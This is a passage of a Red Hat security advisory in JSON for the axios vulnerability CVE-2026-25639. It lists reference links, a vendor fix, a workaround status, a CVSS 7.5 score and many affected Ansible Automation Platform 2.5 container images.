"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25639"
},
{
"category": "external",
"summary": "https://github.com/axios/axios/commit/28c721588c7a77e7503d0a434e016f852c597b57",
"url": "https://github.com/axios/axios/commit/28c721588c7a77e7503d0a434e016f852c597b57"
},
{
"category": "external",
"summary": "https://github.com/axios/axios/releases/tag/v1.13.5",
"url": "https://github.com/axios/axios/releases/tag/v1.13.5"
},
{
"category": "external",
"summary": "https://github.com/axios/axios/security/advisories/GHSA-43fc-jf86-j433",
"url": "https://github.com/axios/axios/security/advisories/GHSA-43fc-jf86-j433"
}
],
"release_date": "2026-02-09T20:11:22.374000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-03-31T22:34:16+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\nFor details on how to apply this update, refer to:\nhttps://docs.redhat.com/en/documentation/red_hat_ansible_automation_platform/2.5#Upgrading",
"product_ids": [
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-rhel8@sha256:0682e9e4bc9ad2b2b564fa2fa8b022e46729b27e26ec7b14ed2f1fae3e52a0d1_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-rhel8@sha256:2f25f26750ceac18fd9c059eb3f11cc400dc0160d9ca78eded86af360c81d201_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-rhel8@sha256:360d270a9167d79e297b050093209bcc9e0d854045b9ba116192073ce44c662c_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-rhel8@sha256:7d75c8ac498141ba26b4a927dbc4b4426a566da5ba09d4e0017fbf715bd05b27_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:6308"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/aap-must-gather-rhel8@sha256:0f8839e5aee29a659fc87dbe1974d52807b02232b12bfae0a9ee75f72f6822d8_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/aap-must-gather-rhel8@sha256:cbed194c572c59551a2b73e61d8c3821df77d5a9ca7d2275062c439996a24eb4_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/aap-must-gather-rhel8@sha256:f501719d54fc49e168385702bb0e1d8432b65f129a56a8fe184557a715956196_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/aap-must-gather-rhel8@sha256:fe250f135f03aecf8489c1cee9721b9e48549e19d5a609a3d3284fe7d758a34d_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-builder-rhel8@sha256:6fd7c632b981a1b0593c6af234c4b40d1046eabebe41ce29f75e1e010e92226a_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-builder-rhel8@sha256:b8d2a7da8627fa6a020330453c9fee31ba37a8eddd2d014fafa5bf3ed838fb5e_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-builder-rhel8@sha256:c264a07ccc7020902897cc9420a76dc590431596fc74696b57e42c2cc658a3f7_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-builder-rhel8@sha256:de9acb254c64d4b5f060867ac81c3c7b92da197bd62914705f47f81c719000f9_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-dev-tools-rhel8@sha256:299e584db6227b51630ff777864b19113e8a1ea8100aa5c1bde092f730f35911_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-dev-tools-rhel8@sha256:3aae092b74e73969f4328e406f804297e44130fea3232db3403db98463e42d9c_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-dev-tools-rhel8@sha256:b77247eccd37c9bc29631142605c6fab3af9d23ebf82b43f049664e44193d377_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-dev-tools-rhel8@sha256:f1eb81b968bdee5bbfa48e25718ac574bdda09c2acf726d9f058e0643585d59d_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-python-base-rhel8@sha256:009336407c386ffb1f5f1bdb7a38256e73b8b2ec97036f8ab84e7293f517ef8e_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-python-base-rhel8@sha256:82e4da659d4bbf036bafee5f598602ec32b7b5f8d3d595287dcf418288bf2147_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-python-base-rhel8@sha256:8ee6e0938cc2189984009da95ebd6fb4f5946cf9e1f7ef7aae8d6f40dfc7ab36_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-python-base-rhel8@sha256:90d90e31d0afe833778743baf4eb3527402a65c30fdcce149ff8d4820faa3781_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-python-toolkit-rhel8@sha256:34bfde79221d2f824177f72d68a877b63bfe88b1f0562741a2dc212f83cb4e62_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-python-toolkit-rhel8@sha256:c25356366526086b2e85274793b8e9dadf1a04d35515087d4421c74bb9b4bacf_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-python-toolkit-rhel8@sha256:c5923a2649845cc20cdc2d015442d8007e9e0f77522d652d8af389437681c4ed_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-python-toolkit-rhel8@sha256:d91f808a230d11c3b998cbd703fd8fd043188164f61962b5518cda91ad19712b_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/controller-rhel8-operator@sha256:0d79e8c5f3f36c290006c0adbe7c14f57bad10566017f005ae4073905b170136_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/controller-rhel8-operator@sha256:57bf7919da3de08961e4c151b08dab1c756353a4040d0dd66feb72fcfe1cc8ce_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/controller-rhel8-operator@sha256:6d0a4b9c41713e592707a1b93d48f197977bf9eb05aa5e87a083976720061cbb_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/controller-rhel8-operator@sha256:c6d21fc02716334ab7f6c48ba7d102965d197209c5a9fd3b41a6ea65b5da0055_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/controller-rhel8@sha256:48f4971662ddb841e25bb610f72ef5f37eddf482b117786595d80d0931448236_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/controller-rhel8@sha256:6ec99dbde70c05dc5fbd64f81779f75ca8a131c0d3865f1be318a4cd8152ed33_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/controller-rhel8@sha256:783723cc28521153aef6aeaee7786f8bb87e01ef738b90b8b5fb2f2b2fb6c780_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/controller-rhel8@sha256:7c13d95770002e16dbd5dc86ea82f6fc5e70828582b928d9e3388ecded90b67a_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/de-minimal-rhel8@sha256:7188e3f507cdaa346ed930c158379a67104dbdc74535a2b5a541cea60c03a123_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/de-minimal-rhel8@sha256:85c083ae0b2493347cbf1e5885ad56335b1799e545f136118cfe597f39f3df6e_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/de-minimal-rhel8@sha256:c5079720f6ea2ab7fb6b1acc6fa0c3c5087d91507c2fb21bb5b4ebc57953b4cf_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/de-minimal-rhel8@sha256:f250376b2a72ff2e0bd866bbd8142c5e071218351ad62c52cd7b7a6f3baab026_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/de-supported-rhel8@sha256:0a10e9afd9c3d555a36db84f938973f14fb099164b1ba5068f9e5a9cfec51f01_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/de-supported-rhel8@sha256:1fcab1dccdd7ab7976ac0a57fad193d9411aecdc82cc24752378589978ab3c83_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/de-supported-rhel8@sha256:21636d382f0a42b7d87d3b1f4ee53bf73e589bb549750d279ca21f96517d7a3d_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/de-supported-rhel8@sha256:ac48a386cf9175fa667538475607d8d7444e2d21e77bea8ce8d3bf291c59d4a0_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8-operator@sha256:0e5a121065f55cb7381d74794dd44b02a564195bca3bdfd9d9a10905fd0995a6_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8-operator@sha256:3838ae2045ed11b4bfe2c86675a5bebe4f51971d30322af3721969e3e2fca06f_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8-operator@sha256:a23c10d8ea852924e8c89a80cb561b2ed9dbacb13257401181b9b13ddf6786ee_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8-operator@sha256:a592586194e5234cfcc2d783f876713771ac489c530205e87053a60b1dd90e04_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8@sha256:268a35d7a2bb13547826ec27291d5b48b2abe1d530b49a6085fcdde9410b61f8_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8@sha256:985cf2d3da53a542a87d98e4b698f53cf9b99e1a09e86b206f42c96833c2b35c_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8@sha256:9cda51df51a24542cd1cd9cd4c072389340d0e678d82236d38c64568cf5d552d_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8@sha256:fe9512b0361734dcaa41b19c4f02b36ec45896ff911dd44a9e821fdd60d30374_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-ui-rhel8@sha256:17c4c5a579c802fc9a4ee935ad723f65c63aa63ce3b5e4a91705c12ec59feca6_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-ui-rhel8@sha256:3b3a79cebad3f9230b476752c3a6dc29b3d5179d0a3fcf90707eaf14da11ae84_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-ui-rhel8@sha256:a28642cbd593dcdd8673c4bdac30da6eafba29e8abc4ddeaa12369177b5052c7_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-ui-rhel8@sha256:bd47ed866c9bee7c22e7fafcb959df87f64abdbea9f38603a377216f99be3b43_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ee-minimal-rhel8@sha256:1254e449d313f5f663d056097b9cddbcd7fce91c7a6448b1d4f57c622d9556b3_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ee-minimal-rhel8@sha256:8523ece411bf1842b9309abc7dea7067a26a0efd6cb0510449a6573df820a45c_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ee-minimal-rhel8@sha256:bde426912de4c15616e3b71408f4760fd12172dc97ce15d5511d0094784643eb_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ee-minimal-rhel8@sha256:c87feb6c292b8f95cc840237e3a498eaa3198447f11bb3dd652818e1128bf4a4_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ee-supported-rhel8@sha256:6547c593ea515750150478d442e17f113fb76ec611f6d7c2ff62223e1742a083_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ee-supported-rhel8@sha256:d6fe585bac62fd646127894dcb9bf55462daf60a22c8721ee44658fbdd3e99a6_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ee-supported-rhel8@sha256:e8c26f06cca6450dc68a6160a6d1ababdf0992ed9000f27dea5177b813671653_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ee-supported-rhel8@sha256:eab05f26b14dd06d7e4f5580a873d8bdb18317abf1e82300da089cba5129bdb4_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-proxy-rhel8@sha256:049878acbb0f6297eae90180b88b011d00e954285d3197e2c19bc17e82f67523_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-proxy-rhel8@sha256:6624a8e702ff2bc3f07b63a8fec42034c48b41bb187818fd4f2dd8a8f60766cb_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-proxy-rhel8@sha256:b829b37753a3d14aebf4d114973f843dfc6e4706cf2375408bab8950ab15d2ff_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-proxy-rhel8@sha256:c41ad877f30bc37bd9fe8422c410da12159b8fba7ab9ed0fd174e0d30a1ed125_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-rhel8-operator@sha256:47315b849e1e70f6240f310ed5b6d402f6512973bd94bb70d9138d03b790b1a8_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-rhel8-operator@sha256:8b63224e8726db24bf51a5456ef9ede17299e1d920d57a66c49be8a03d3485ed_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-rhel8-operator@sha256:9a20dbc471286e91b2687c22b692a335b287f8eaba817c0f4b6c31b42a669b94_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-rhel8-operator@sha256:b104daa98ef64f2be52d0066ca490a98ef3380a4516038711972be8c01a16571_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-rhel8@sha256:0b65799b577e98beaa59b850028bbfc2d2b112465d1661cd6ab90fb0dd296695_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-rhel8@sha256:116d10699e27737b256b1ccd035c65334696553d107c1002eb85be69aec4c65a_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-rhel8@sha256:78bb5cce2e05156b39a961747174a819c945298fb2f444ef321de6f2bbd5ac5b_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-rhel8@sha256:9b3fd70beaca874656c8e051fa6b3f04b8cbc99e61278a953832637c8c0fb18a_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-rhel8-operator@sha256:0997e7c2515f817d857c9c3dc157f7adec41553adfc3a22913bd65c90b1c9924_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-rhel8-operator@sha256:bac6445179c1c27314e958b41b3d67b1d34dcb05ac9a360a8fe297ab631d64f7_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-rhel8-operator@sha256:d55d0744741b5fcd00107cc2a443dec11696a5daa453a4d992f1e15c3f4708b2_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-rhel8-operator@sha256:dec36413a14d42948aa73339aaba4e5b22f38ddc364436c66ab9d1a8aac465b3_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-rhel8@sha256:1074bbb8a68b75e8c8635bc622bf059cf0ae5bf582d48af31eca9bfc4f4787e8_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-rhel8@sha256:1d1f1078e7a5d916a6df61d83b6c38512a4f1e6ca71d91212fd539aa3be4d8ed_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-rhel8@sha256:c8fd574a2ddb034be88d78b49ae22de5fea68679c0a9f1f3e24583ef118fb532_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-rhel8@sha256:f1abc733921423176ccd6bc3b31093c151b84bdfa9a82b1f640a540edbfbf358_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-web-rhel8@sha256:0bdf70b361111ad28cc4c5a38a52fb7557a7256c45d31b9c187fba4213c1080d_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-web-rhel8@sha256:20537bc868859605ba1a227b8ffaa4523c03b67093e71e910d8cb3b8fbe0392d_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-web-rhel8@sha256:6481c675623cee9bcabd4a1c3a04d169c46e103c944af5ef69a75fc9bd69dfb8_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-web-rhel8@sha256:e474929fa188b73d80eee028cd51e54f07157e587071cf60109f4398ea4dce30_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-chatbot-rhel8@sha256:2f9ec28f18893b516b9dadcce88a8efaa908e916305f7b802f250c2283c37cb5_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-chatbot-rhel8@sha256:3e61238b7400447dfd7999d053e7f701d7c84d62e4a0ef29950c39f3843fb467_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-chatbot-rhel8@sha256:9bbe1c621a8ee4c960e945c0f1a57c89654314435ea00083abbeb390991c62bb_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-chatbot-rhel8@sha256:c3451ed3202ea6b8328f1cacd4fe0205df1fa0d3eec3a960873ec493e9d49d67_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-rhel8-operator@sha256:3cbb5b8c06d7911476e411419ff88a02126e0a6f4f514247e112afc9f939c80f_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-rhel8-operator@sha256:433143f26cf3ebbc1e6492d8e6b96a0fe82dbb46a54859e9a10fef1e5f71842d_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-rhel8-operator@sha256:c7b4a67cf4b2a1fece30e67d57c67d850d6f9866cf6fc39206b4ca09956e4deb_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-rhel8-operator@sha256:f1d3f1a1c0396fa4f3b5496af6a6d2dfc231c8d8bc453774b2c4319bfd00b96e_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-rhel8@sha256:0682e9e4bc9ad2b2b564fa2fa8b022e46729b27e26ec7b14ed2f1fae3e52a0d1_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-rhel8@sha256:2f25f26750ceac18fd9c059eb3f11cc400dc0160d9ca78eded86af360c81d201_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-rhel8@sha256:360d270a9167d79e297b050093209bcc9e0d854045b9ba116192073ce44c662c_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-rhel8@sha256:7d75c8ac498141ba26b4a927dbc4b4426a566da5ba09d4e0017fbf715bd05b27_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/platform-resource-rhel8-operator@sha256:7686b10f4f4091c5e56ce58c6c12f6cff0b7d5fd526fd606e92abf75eb6b13c2_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/platform-resource-rhel8-operator@sha256:c20cc51275c70431b1e730ca48a82942c5385bba90aeb514e01fd3e142c158d0_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/platform-resource-rhel8-operator@sha256:df33172c1cb33952183c80ab0f86c5f414a5103b9eb0757f744103678a6992ff_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/platform-resource-rhel8-operator@sha256:e0c6a368dc6da0906c102aa3587b297e7fe4d4072b5b019a2f3e1a0d54c8053b_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/platform-resource-runner-rhel8@sha256:5596feea40bd5eaf4e97a7eb33c4e7069e802fc921e1fa5fd65b7db9ff99637f_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/platform-resource-runner-rhel8@sha256:b4bf1128add34cd02dbb769b2445af2491cb1fe3b23d8aaecdff3044ecb889be_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/platform-resource-runner-rhel8@sha256:ce70350c29cfb97ebfa8f0782b6c193c1693704cc184c039329df915aeeaaaa2_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/platform-resource-runner-rhel8@sha256:f700beaf7b8466e958876ea71762439e9b7224f34f066a72e3454b7ab450e0cb_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/receptor-rhel8@sha256:05a079835148d3cb9357e0c911ba78646748c4373b4f39cb995fc6f6a1d35315_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/receptor-rhel8@sha256:43e267abfa4d52a2fb3677406ee8c7a44cb7ddecb94fe13b852546eb4a8c2b99_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/receptor-rhel8@sha256:b8ad28fb112c9f076499050ed7f27e1fce701bbc9cf3c1835c113a6a0bd9e915_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/receptor-rhel8@sha256:e34860aa425dc582c6e2214d5762a31e84f62d905469b3f130fc3980a03c36b1_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:8a3978970e82e80c57d44ef3187049eaf58b715460442363a239bf023db64791_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:bc8fc8ba010f7e49b2c9a1b8994d6de05650f8028b2c6dbb0db3e721ed53cdef_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/aap-must-gather-rhel8@sha256:0f8839e5aee29a659fc87dbe1974d52807b02232b12bfae0a9ee75f72f6822d8_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/aap-must-gather-rhel8@sha256:cbed194c572c59551a2b73e61d8c3821df77d5a9ca7d2275062c439996a24eb4_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/aap-must-gather-rhel8@sha256:f501719d54fc49e168385702bb0e1d8432b65f129a56a8fe184557a715956196_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/aap-must-gather-rhel8@sha256:fe250f135f03aecf8489c1cee9721b9e48549e19d5a609a3d3284fe7d758a34d_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-builder-rhel8@sha256:6fd7c632b981a1b0593c6af234c4b40d1046eabebe41ce29f75e1e010e92226a_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-builder-rhel8@sha256:b8d2a7da8627fa6a020330453c9fee31ba37a8eddd2d014fafa5bf3ed838fb5e_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-builder-rhel8@sha256:c264a07ccc7020902897cc9420a76dc590431596fc74696b57e42c2cc658a3f7_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-builder-rhel8@sha256:de9acb254c64d4b5f060867ac81c3c7b92da197bd62914705f47f81c719000f9_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-dev-tools-rhel8@sha256:299e584db6227b51630ff777864b19113e8a1ea8100aa5c1bde092f730f35911_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-dev-tools-rhel8@sha256:3aae092b74e73969f4328e406f804297e44130fea3232db3403db98463e42d9c_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-dev-tools-rhel8@sha256:b77247eccd37c9bc29631142605c6fab3af9d23ebf82b43f049664e44193d377_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-dev-tools-rhel8@sha256:f1eb81b968bdee5bbfa48e25718ac574bdda09c2acf726d9f058e0643585d59d_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-python-base-rhel8@sha256:009336407c386ffb1f5f1bdb7a38256e73b8b2ec97036f8ab84e7293f517ef8e_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-python-base-rhel8@sha256:82e4da659d4bbf036bafee5f598602ec32b7b5f8d3d595287dcf418288bf2147_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-python-base-rhel8@sha256:8ee6e0938cc2189984009da95ebd6fb4f5946cf9e1f7ef7aae8d6f40dfc7ab36_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-python-base-rhel8@sha256:90d90e31d0afe833778743baf4eb3527402a65c30fdcce149ff8d4820faa3781_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-python-toolkit-rhel8@sha256:34bfde79221d2f824177f72d68a877b63bfe88b1f0562741a2dc212f83cb4e62_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-python-toolkit-rhel8@sha256:c25356366526086b2e85274793b8e9dadf1a04d35515087d4421c74bb9b4bacf_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-python-toolkit-rhel8@sha256:c5923a2649845cc20cdc2d015442d8007e9e0f77522d652d8af389437681c4ed_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-python-toolkit-rhel8@sha256:d91f808a230d11c3b998cbd703fd8fd043188164f61962b5518cda91ad19712b_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/controller-rhel8-operator@sha256:0d79e8c5f3f36c290006c0adbe7c14f57bad10566017f005ae4073905b170136_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/controller-rhel8-operator@sha256:57bf7919da3de08961e4c151b08dab1c756353a4040d0dd66feb72fcfe1cc8ce_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/controller-rhel8-operator@sha256:6d0a4b9c41713e592707a1b93d48f197977bf9eb05aa5e87a083976720061cbb_amd64",
